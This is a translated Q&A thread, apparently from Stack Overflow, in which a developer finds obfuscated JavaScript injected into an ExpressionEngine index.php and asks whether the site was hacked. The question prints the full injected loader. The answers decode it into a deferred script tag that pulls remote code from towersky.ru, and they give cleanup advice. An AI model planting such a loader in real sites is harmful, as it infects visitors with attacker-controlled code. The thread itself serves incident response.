1. дома
  2. Вопрос и ответ
  3. Странный Javascript в шаблоне. Это попытка взлома?

Странный Javascript в шаблоне. Это попытка взлома?

2010-06-10 2 views
8

Я проверил сайт моего клиента на xHTML Strict 1.0/CSS 2.1 на прошлой неделе. Сегодня, когда я повторно проверил, у меня была ошибка проверки, вызванная странным и предыдущим неизвестным скриптом. Я нашел это в файле index.php моей ExpressionEngine CMS. Я подозреваю, что это попытка взлома? Я не мог не заметить русский домен, закодированный в скрипте ...Странный Javascript в шаблоне. Это попытка взлома?

Что это за javascript? Мне нужно объяснить конкретные опасности для моего клиента.




    this.v=27047; 
    this.v+=187; 
    ug=["n"]; 
    OV=29534; 
    OV--; 
    var y; 
    var C="C"; 
    var T={}; 

    r=function(){ 
     b=36068; 
     b-=144; 
     M=[]; 

     function f(V,w,U){ 
      return V.substr(w,U); 
      var wH=39640; 
     } 

     var L=["o"]; 
     var cj={}; 
     var qK={N:false}; 
     var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2); 
     var BT="BT"; 
     var fV=RegExp; 
     var CE={bf:false}; 
     var UW=''; 
     this.Ky=11592; 
     this.Ky-=237; 
     var VU=document; 
     var _n=[]; 

     try {} catch(wP){}; 

     this.JY=29554; 
     this.JY-=245; 

     function s(V,w){ 
      l=13628; 
      l--; 
      var U="["+w+String("]"); 
      var rk=new fV(U, f("giId",0,1)); 
      this.NS=18321;this.NS+=195;return V.replace(rk, UW); 

      try {} catch(k){}; 
     }; 

     this.jM=""; 
     var CT={}; 
     var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z'); 

     try {var vv='m'} catch(vv){}; 

     var Os={}; 
     var t=null; 
     var e=String("bod"+"y"); 
     var F=155183-147103; 
     this.kp=''; 
     Z={Ug:false}; 
     y=function(){ 
      var kl=["mF","Q","cR"]; 

      try { 
       Bf=11271; 
       Bf-=179; 
       var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5'); 
       Fp=VU[u](A); 
       var H=""; 

       try {} catch(WK){}; 

       this.Ca=19053; 
       this.Ca--; 
       var O=s('s5rLcI','2A5IhLo'); 
       var V=F+fa; 
       this.bK=""; 
       var ya=String("de"+"fe"+f("r3bPZ",0,1)); 
       var bk=new String(); 
       pB=9522; 
       pB++; 
       Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V; 
       Fp[ya]=[1][0]; 
       Pe=45847; 
       Pe--; 
       VU[e].appendChild(Fp); 
       var lg=new Array(); 
       var aQ={vl:"JC"}; 
       this.KL="KL"; 
      } 
      catch(x){ 
       this.Ja=""; 
       Th=["pj","zx","kO"]; 
       var Jr=''; 
      }; 

      Tr={qZ:21084}; 
     }; 

     this.pL=false; 
    }; 

    be={}; 
    rkE={hb:"vG"}; 
    r(); 
    var bY=new Date(); 
    window.onload=y; 
    cU=["Yr","gv"];

источник

2010-06-10 Julian

+0

Спасибо за подтверждение. Я собираюсь предложить ему сменить все пароли и обновить до последней версии Expression Engine. – Julian

ответ

14

Да. Сайт был скомпрометирован.

Что вам нужно сделать, это:

  1. Убедитесь, что каждый, кто имел доступ к этим паролям запустить обновленный VirusScan на компьютерах, которые они, возможно, вошли в сайт с.
  2. Убедитесь, что вы изменили пароль для входа и администратора.
  3. Если возможно, вы, вероятно, должны вернуться к кодовой базе, как это было до того, как вы натолкнулись на это.
  4. Проверьте время модификации скрипта, в котором вы нашли этот фрагмент (если не слишком поздно), и найдите другие файлы, которые были изменены в это время. Сценарий, скорее всего, генерируется случайным образом, поэтому grepping для его частей вряд ли будет окончательным.

Если этот скрипт смог найти свой путь, то и другие. Это не редкость, что веб-сайты скомпрометированы с помощью троянов с клавиатурой на компьютерах тех, кто входит в них.
См http://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity

источник

2010-06-10 23:56:45 unomi

+0

Спасибо за советы. Единственными файлами, измененными в это время, были файл index.php для механизма выражения и два старых файла index.htm, которые использовались для предыдущего дизайна сайта. Видимо, они нацелены на индексные файлы? Я передам эти предложения и надеюсь, что это предотвратит катастрофу, пока не стало слишком поздно! – Julian

+0

Самое последнее обновление было <тип скрипта = "текст/JavaScript"> $ (документ) .ready (функция() { document.title = 'New Title'; }); Считаете ли вы, что это может быть с этим связано? – Julian

+0

Нет, для того чтобы сценарий был встроен таким образом, что сам сервер должен был быть скомпрометирован. Либо они нашли эксплойт, чтобы получить доступ на запись на сервере, либо им удалось получить учетные данные для входа либо через слабые пароли, тупицу или трояны. – unomi

4

Сценарий в основном добавляет следующую строку закрытия тела тега:

<script defer="defer" src="http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php"></script>

Таким образом, его пытается загрузить внешний скрипт на вашем сайте. Я не уверен, что делает этот скрипт, но, без сомнения, его ничего хорошего.

Кроме того, быстрый поиск "towersky.ru" в google показывает списки вредоносных сайтов, содержащих этот сайт.

источник

2010-06-11 00:14:55 user353297

+3

Я думаю, что ребята на towersky.ru могут быть здесь очень благородной миссией. Включенный скрипт называется «speedtest.net.php», поэтому, возможно, они просто пытаются внедрить этот скрипт на все веб-страницы по всему миру, и если вы работаете на сайте медленно, они просто вызовут и сообщают вам о Это. – Anurag

+0

Это справедливо, но у вас действительно есть доказательства этого. Кроме того, если бы кто-то ввел такой код на мой сайт, явно без разрешения, я не был бы слишком доволен. Кроме того, почему были предприняты такие усилия, чтобы скрыть то, что делает скрипт? Использование «google.com» и «depositfiles.com» делает его еще более подозрительным - он пытается заставить его выглядеть так, как если бы код был из Google. – user353297

+0

@ user353297 Анураг шутил ... – Josh

11

В приведенном выше коде содержится код, который активирует код на русском сайте (http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php), который добавляет невидимый DIV, содержащий iFrame, который, как я предполагаю, содержит изображение щенка.

источник

2010-06-11 00:15:02 Seth

+1

Ты прав, сэр. Щенки. – Sphvn

2

Учитывая, что я даже не мог загрузить эту страницу в Windows, потому что мой AV остановил меня, да, это вирус.

источник

2010-06-11 15:38:10 TheLQ

Смежные вопросы

 Смежные вопросы